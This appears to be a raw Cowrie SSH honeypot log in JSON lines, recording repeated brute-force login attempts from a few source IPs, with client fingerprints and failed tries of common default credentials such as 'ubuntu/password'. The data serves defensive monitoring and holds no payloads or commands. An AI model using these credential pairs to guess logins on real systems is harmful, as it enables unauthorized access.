{"eventid":"cowrie.login.failed","username":"user","password":"123456789","message":"login attempt [user/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T22:42:56.342547Z","src_ip":"196.251.115.108","session":"b2be3753d2d1"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:42:57.551390Z","src_ip":"196.251.115.108","session":"b2be3753d2d1"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54662,"dst_ip":"1.2.3.4","dst_port":22,"session":"235aa229dc65","protocol":"ssh","message":"New connection: 196.251.115.108:54662 (1.2.3.4:22) [session: 235aa229dc65]","sensor":"my-vps","timestamp":"2025-08-24T22:43:40.123562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:43:40.744185Z","src_ip":"196.251.115.108","session":"235aa229dc65"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:43:40.745157Z","src_ip":"196.251.115.108","session":"235aa229dc65"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345","message":"login attempt [user/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T22:43:44.326189Z","src_ip":"196.251.115.108","session":"235aa229dc65"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:43:45.607338Z","src_ip":"196.251.115.108","session":"235aa229dc65"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":34172,"dst_ip":"1.2.3.4","dst_port":22,"session":"259f5caf0d2e","protocol":"ssh","message":"New connection: 196.251.115.108:34172 (1.2.3.4:22) [session: 259f5caf0d2e]","sensor":"my-vps","timestamp":"2025-08-24T22:44:29.094830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:44:29.417697Z","src_ip":"196.251.115.108","session":"259f5caf0d2e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:44:29.418549Z","src_ip":"196.251.115.108","session":"259f5caf0d2e"}
{"eventid":"cowrie.login.failed","username":"user","password":"12345678","message":"login attempt [user/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T22:44:32.883526Z","src_ip":"196.251.115.108","session":"259f5caf0d2e"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:44:34.226743Z","src_ip":"196.251.115.108","session":"259f5caf0d2e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":38292,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fddadd207c5","protocol":"ssh","message":"New connection: 196.251.115.108:38292 (1.2.3.4:22) [session: 9fddadd207c5]","sensor":"my-vps","timestamp":"2025-08-24T22:45:18.050724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:45:18.611439Z","src_ip":"196.251.115.108","session":"9fddadd207c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:45:18.612113Z","src_ip":"196.251.115.108","session":"9fddadd207c5"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty","message":"login attempt [user/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T22:45:22.273668Z","src_ip":"196.251.115.108","session":"9fddadd207c5"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:45:23.488795Z","src_ip":"196.251.115.108","session":"9fddadd207c5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":47058,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e11987c49f","protocol":"ssh","message":"New connection: 196.251.115.108:47058 (1.2.3.4:22) [session: a5e11987c49f]","sensor":"my-vps","timestamp":"2025-08-24T22:46:06.021186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:46:06.264502Z","src_ip":"196.251.115.108","session":"a5e11987c49f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:46:06.265260Z","src_ip":"196.251.115.108","session":"a5e11987c49f"}
{"eventid":"cowrie.login.failed","username":"user","password":"123123","message":"login attempt [user/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T22:46:10.136752Z","src_ip":"196.251.115.108","session":"a5e11987c49f"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:46:11.327143Z","src_ip":"196.251.115.108","session":"a5e11987c49f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55974,"dst_ip":"1.2.3.4","dst_port":22,"session":"456e5168eaee","protocol":"ssh","message":"New connection: 196.251.115.108:55974 (1.2.3.4:22) [session: 456e5168eaee]","sensor":"my-vps","timestamp":"2025-08-24T22:46:54.221078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:46:54.522687Z","src_ip":"196.251.115.108","session":"456e5168eaee"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:46:54.523347Z","src_ip":"196.251.115.108","session":"456e5168eaee"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T22:46:57.880752Z","src_ip":"196.251.115.108","session":"456e5168eaee"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:46:59.079495Z","src_ip":"196.251.115.108","session":"456e5168eaee"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":35742,"dst_ip":"1.2.3.4","dst_port":22,"session":"f15e15541ccf","protocol":"ssh","message":"New connection: 196.251.115.108:35742 (1.2.3.4:22) [session: f15e15541ccf]","sensor":"my-vps","timestamp":"2025-08-24T22:47:42.848741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:47:43.194086Z","src_ip":"196.251.115.108","session":"f15e15541ccf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:47:43.195010Z","src_ip":"196.251.115.108","session":"f15e15541ccf"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T22:47:46.862736Z","src_ip":"196.251.115.108","session":"f15e15541ccf"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:47:48.025518Z","src_ip":"196.251.115.108","session":"f15e15541ccf"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":44252,"dst_ip":"1.2.3.4","dst_port":22,"session":"f43a821d9ca9","protocol":"ssh","message":"New connection: 196.251.115.108:44252 (1.2.3.4:22) [session: f43a821d9ca9]","sensor":"my-vps","timestamp":"2025-08-24T22:48:30.978919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:48:31.377100Z","src_ip":"196.251.115.108","session":"f43a821d9ca9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:48:31.377839Z","src_ip":"196.251.115.108","session":"f43a821d9ca9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-24T22:48:35.455031Z","src_ip":"196.251.115.108","session":"f43a821d9ca9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:48:36.589418Z","src_ip":"196.251.115.108","session":"f43a821d9ca9"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52238,"dst_ip":"1.2.3.4","dst_port":22,"session":"27bfbb4d648d","protocol":"ssh","message":"New connection: 217.72.205.35:52238 (1.2.3.4:22) [session: 27bfbb4d648d]","sensor":"my-vps","timestamp":"2025-08-24T22:49:15.686316Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:49:15.687399Z","src_ip":"217.72.205.35","session":"27bfbb4d648d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":48762,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4763b1f3732","protocol":"ssh","message":"New connection: 196.251.115.108:48762 (1.2.3.4:22) [session: e4763b1f3732]","sensor":"my-vps","timestamp":"2025-08-24T22:49:20.348686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:49:20.980899Z","src_ip":"196.251.115.108","session":"e4763b1f3732"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:49:20.982562Z","src_ip":"196.251.115.108","session":"e4763b1f3732"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456789","message":"login attempt [ubuntu/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T22:49:24.139418Z","src_ip":"196.251.115.108","session":"e4763b1f3732"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:49:25.368855Z","src_ip":"196.251.115.108","session":"e4763b1f3732"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.197.1","src_port":48356,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb36f879f63c","protocol":"ssh","message":"New connection: 45.78.197.1:48356 (1.2.3.4:22) [session: bb36f879f63c]","sensor":"my-vps","timestamp":"2025-08-24T22:49:27.922004Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.197.1","src_port":33130,"dst_ip":"1.2.3.4","dst_port":22,"session":"21469d54f2db","protocol":"ssh","message":"New connection: 45.78.197.1:33130 (1.2.3.4:22) [session: 21469d54f2db]","sensor":"my-vps","timestamp":"2025-08-24T22:49:42.578044Z"}
{"eventid":"cowrie.session.closed","duration":"34.8","message":"Connection lost after 34.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:50:02.716882Z","src_ip":"45.78.197.1","session":"bb36f879f63c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":55926,"dst_ip":"1.2.3.4","dst_port":22,"session":"39af2786e150","protocol":"ssh","message":"New connection: 196.251.115.108:55926 (1.2.3.4:22) [session: 39af2786e150]","sensor":"my-vps","timestamp":"2025-08-24T22:50:09.451790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:50:09.794878Z","src_ip":"196.251.115.108","session":"39af2786e150"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:50:09.796002Z","src_ip":"196.251.115.108","session":"39af2786e150"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345","message":"login attempt [ubuntu/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T22:50:13.406192Z","src_ip":"196.251.115.108","session":"39af2786e150"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:50:14.538405Z","src_ip":"196.251.115.108","session":"39af2786e150"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:50:18.915231Z","src_ip":"45.78.197.1","session":"21469d54f2db"}
